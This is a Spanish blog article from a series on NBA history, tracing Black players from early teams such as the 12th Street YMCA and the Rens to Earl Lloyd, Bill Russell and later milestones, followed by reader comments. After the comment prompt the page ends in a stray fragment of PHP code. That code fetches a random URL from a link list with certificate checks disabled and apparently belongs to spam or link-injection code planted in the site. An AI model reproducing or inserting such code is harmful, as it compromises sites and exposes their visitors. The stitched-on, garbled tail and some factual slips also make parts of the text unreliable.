Afroamericanos en el baloncesto profesional americano

13 de May de 2010 por Sergio
Artículo 5 de 9 de la serie Historia de la NBA

Cuando pensamos en un deporte dominado por personas de raza negra, muchos de nosotros apuntaremos sin pensar al baloncesto. A pesar de las trabas que siempre han encontrado todos los descendientes de personas del continente negro a la hora de ser aceptados en las diferentes parcelas sociales de las sociedades desarrolladas, el baloncesto ejemplifica uno de los sectores en los que siempre fueron considerados precursores, y su historia puede servir para relatar los paralelismos entre la consecución de igualdad en los Derechos Civiles y su aceptación como parte fundamental de la liga.

La importancia de los afroamericanos en el deporte de la canasta americano ha sufrido una serie de vaivenes durante su historia. Si bien ya hemos relatado en artículos anteriores el impacto de equipos formados por jugadores de raza negra durante los primeros años de vida del baloncesto estadounidense, como los Rens, Savoy Big Five o Harlem’s Globetrotters, su inclusión en ligas profesionales americanas nunca fue un camino fácil. Antes de entrar en la época de formación de las distinas ligas haremos un breve repaso por el resto de equipos que, históricamente, han tenido una repercusión en el aumento de prestigio de la raza negra en el mundo de la canasta.

Los Chicagoans, equipo que jugó por el medio-oeste de EEUU entre la mitad de la década de los años 20 y 30, fue fundado por Bill Brock, antiguo jugador de baloncesto del equipo de la Armada estaounidense (uno de los equipos precursores en la implantación de jugadores de ascendecia africana en el baloncesto) y Chicago Defenders. Por este equipo, que disputaba partidos contra otros conjuntos aficionados, pasaron jugadores como Byron “Fat” Long, William “Kid” Oliver y el futuro Globetrotter Hillary Brown. Dentro de sus tours por los diferentes estados americanos, consiguieron cierta reputación entre el mundo amateur con temporadas de 24 victorias sobre 25 partidos disputados. El equipo desapareció misteriosamente en 1933, siendo la última referencia al respecto, una publicación en un diario de Chicago.

Si realmente hablamos de origenes debemos remontarnos a 1910 y a dos equipos en particular, la 12th Street YMCA y el Alpha Physical Culture Club. El primero de ellos, que recibió el “título” de Colored Basketball World’s Champions, estuvo imbatido durante dos años completos en el periodo 1909-10. El segundo de ellos, que ostentó el mismo honor durante el año 1913, fue formado en 1904, siendo el primer equipo deportivo de EEUU formado por personas de raza negra. Sus fundadores eran de procedencia jamaicana y llegaron a disputar una de las ligas originales, la MBA.

Un evento reseñable, entre los producidos por ambos equipos, tuvo lugar el día de Navidad de 1910 en New York. Delante de alrededor de 2.000 espectadores, ambos conjuntos se jugaron la hegemonía baloncestística de aquellos comienzos de siglo, llegando los de YMCA imbatidos a dicho encuentro. Una serie de extrañas decisiones tácticas, como el cambio de posición entre pívot y base por parte de los Alpha Physical, propiciaron el triunfo del equipo de la calle 12 por 24-19. Este partido, y los posteriores encuentros entre conjuntos creados a partir de jugadores que formaban parte de estos primeros, propiciaron encuentro legendarios y constantes desesos de revancha.

Aparte de estos equipos, si una ciudad fue principal foco de creación de competiciones entre equipos de todas las razas en los inicios del pasado siglo, esa fue Washington D.C. En la U. Street de la capital estadounidense tuvieron lugar durante esta primera década cientos de manifestaciones silenciosas en favor del aumento de reconocimiento social de las personas afroamericanas mucho antes del nacimiento de Marthin Luther King. Estas manifestaciones, claro está, procedían en gran parte en forma de encuentros de baloncesto. El verdadero inicio se puede resumir en el nombramiento de Edwin Bancroft Henderson como primera persona de raza negra en ser elegida para impartir clases de educación física en el país norteamericano. Henderson, durante su periplo en la Universidad de Harvard, aprendió parte de los secretos del baloncesto, y vio cierto potencial de desarrollo y ventajas físicas entre las personas de su misma ascendencia. A pesar del segregacionismo existente en el deporte de la capital, el señor Edwin depositó sus esperanzas en el equipo de Central YMCA como entrenador. Aunque las trabas institucionales y políticas no eran pequeñas, el director de la Universidad decidió incluir por primera vez en el equipo a dos jugadores afroamericanos,

El deseo de ambos en ir en contra de las preestablecidas leyes racistas propinó la creación de una pequeña liga de 8 equipos en la que se les permitió formar parte. Desde enero a mayo de 1908, el juego rápido que practicaba el conjunto de la Centra YMCA, extraño en aquellos origenes del baloncesto, recibió seguimiento por parte de cientos de espectadores que iban a verlos jugar. Por aquellos entonces, en los que marcadores de 1-0 se llegaban a producir, el baloncesto up-tempo era toda una revolución.

Como creo haber contado parte de la historia más interesante de los años posteriores hasta la fundación de la BAA en el artículo anterior, pasaré a hablar de los logros individuales y colectivos que consiguieron todos aquellos jugadores de raza negra a partir de la formación de la actual competición. Sin embargo, nombrare al menos a otros equipos importantes para aquellos que quieran profundizar más en el tema: New York All-Stars, Universidad de Howard, Hampton Institute, Monticello Athletic Association, Colored Intercollegiate Athletic Association (primera gran conferencia para personas de color), Loendi Big Five, St. Christopher Club y Smart Set Athletic Club of Brooklyn, todos ellos anteriores a 1925.

No fue hasta el 31 de Octubre de 1950 cuando se produjo la primera participación de un jugador afroamericano en la NBA. Earl Lloyd tiene el privilegio de haber pasado a la historia al entrar en pista durante el encuentro que disputaron sus Washington Bullets. A partir de este momento, la inclusión de estos jugadores se haría de una forma lenta y progresiva, teniendo que llegar al siglo XXI para que algunos precursores pudieran conseguir ciertas hazañas. Aunque actualmente la cantera principal de la liga se centre en barrios marginales entre la población de raza negra, aquellos primeros logros se vieron siempre como eventos puntuales y casi exóticos, como para nosotros puede ser actualmente la participación de jugadores asiáticos.

Si volvemos unos años atrás, a la fundación de la BAA, encontramos a Don Barksdale, que consiguió ser el primer jugador de ascendencia africana en conseguir el nombramiento de All-American y ser incluido en el equipo olímpico estadounidense en 1948, en unos tiempos en los que todos los equipos de la BAA estaba formados por personas de raza caucásica.

El siguiento hito lo lograría Chuck Cooper al ser el primer drafteado en 1950 por los Boston Celtics. Ese mismo año, tuvo lugar la primera firma de contrato, honor que recayó en Nat “SweetWater” Clifton. El hecho del debut de Lloyd fue realmente causa del calendario de aquel año, puesto que tanto Clifton como Cooper jugarían partidos en días posteriores. A pesar de que, tanto Cooper com Clifton, se revelaron como magníficos jugadores, fue Lloyd el primero en formar parte de un equipo campeón de la mano de los Syracuse Nationals (Sacramento Kings actuales).

La influencia de los jugadores afroamericanos no tardaría en notarse en el juego. Como es lógico, los jugadores de raza blanca, ogranizados siempre en torno a reglas y campeonatos oficiales y patrocinados, tenían también un concepto de juego mucho más organizado. Los afroamericanos, sin embargo, estaban más enfocados al deporte-espectáculo, con un juego más físico y dinámico inspirado en los Rens y Globetrotters. Dos años antes de la inclusión del reloj de 24 segundos, llegaría al baloncesto uno de los pocos jugadores que pueden discutir el título de mejor de la historia y auténtico autor del impacto y reconocimiento de la comunidad negra en el deporte de la canasta, el señor de los anillos, Bill Russell. Junto a Red Auerbach, otro revolucionario desde la banda, los Celtics lograrían la mayor hegemonía de una entidad en todo el deporte profesional americano a lo largo de su historia. Me gustaría recordar una frase de Red Auerbach que ilustra perfectamente el carácter competitivo de Russell: “Hoy en diía ves a montones de jugadores bloquear los lanzamientos tan fuerte com pueden, intentando que se pierdan por la línea de banda. Russell siempre intento controlar el balón en el momento del tapón. Bloqueaba un disparo y podía pasarlo directamente a un compañero para iniciar el contragolpe. A veces un tapón era prácticamente un pase. Nadie más ha hecho eso nunca.”

Junto a otras jugadores afroamericanos como K.C. Jones y Sam Jones, Russell y sus Celtics consiguieron 8 campeonatos consecutivos y, a título personal para Bill, el primer MVP para alguien de su clase. Este hecho, aunque no parece revestir especialmente importancia, ejemplifica mejor que ningún otro el cambio de mentalidad y juego en la NBA. A partir de ese año 1958, tan solo 5 jugadores de raza blanca han conseguido hacerse con el título de mejor jugador de la liga regular: Dave Cowens, Bill Walton, Larry Bird, Steve Nash y Dirk Nowitzki.

Los siguientes jugadores en tener un impacto significativo en la liga fueron Elgin Baylor y Wilt Chamberlain. Estos dos magníficos anotadores, quizás los dos mejores físicos que pasaron por la liga hasta los años actuales, consiguieron cientos de hitos estadísticos que están lejos de ser superados actualmente. Desde que Wilt consiguiera el primer título de máximo anotador de la liga, solo Rick Barry, Jerry West y Pete Maravich han conseguido el mismo logro. Baylor, precursor de gente como Erving, Jordan o Carter, ejemplificaba perfectamente el estilo de juego directo y físico que tanto gusta a todos los seguidores del deporte de la canasta. Estos hechos darían el impulso definitivo al pueblo afroamericano en la mejor liga de baloncesto del mundo.

Para no alargar el artículo pasaré a describir el resto de hitos significativos de forma resumida:

– El 26 de Diciembre de 1964, los Boston Celtics forman por primera vez con 5 jugadores afroamericanos como titulares.

– El 15 de Noviemebre de 1966 Bill Russell es nombrado entrenador de los Boston Celtics (jugador-entrenador).

– En 1972 Wayne Embry se convierte en el primer Manager General, ejerciendo el cargo en los Milwaukee Bucks.

– El 10 de Enero de 2003 se le concede a Robert Johnson los derechos de una franquicia NBA, los Charlotte Bobcats.

La actual cantidad de jugadores de raza negra ejemplifica perfectamente el desarrollo social experimentado en EEUU y en el mundo, hito que, junto a la inclusión de las mujeres en el ambito laboral, ha posibilitado el desarrollo económico, social y legal, del mundo occidental.

Comenta

4 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Me intriga eso del “desaparecieron misteriosamente” referente a los Chicagoans.
    Impresionante apunte de Auerbach con respecto a Russell.
    El caso de Russell, dentro de este contexto, por lo visto tuvo miga. Por lo que he leído (y cuento la historia de memoria) acumuló un tremendo rencor frente a las actitudes segregacionistas que vivió en Boston. Si no me equivoco tras retirarse llegó a decir que aquella ciudad era una ciudad racista. Tardó años en reconciliarse con lo que fue su hogar y la cuna de sus éxitos.
    Epocas chungas para los jugadores afroamericanos.

      Citar

  2. Love Denise dice:
    #2

    muy buen artículo, muy completo y detallado, felicidades Segio

      Citar

  3. sergio dice:
    #3

    Gracias hombre

      Citar

  4. martrin dice:
    #4

    esta buenisimo el articulo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>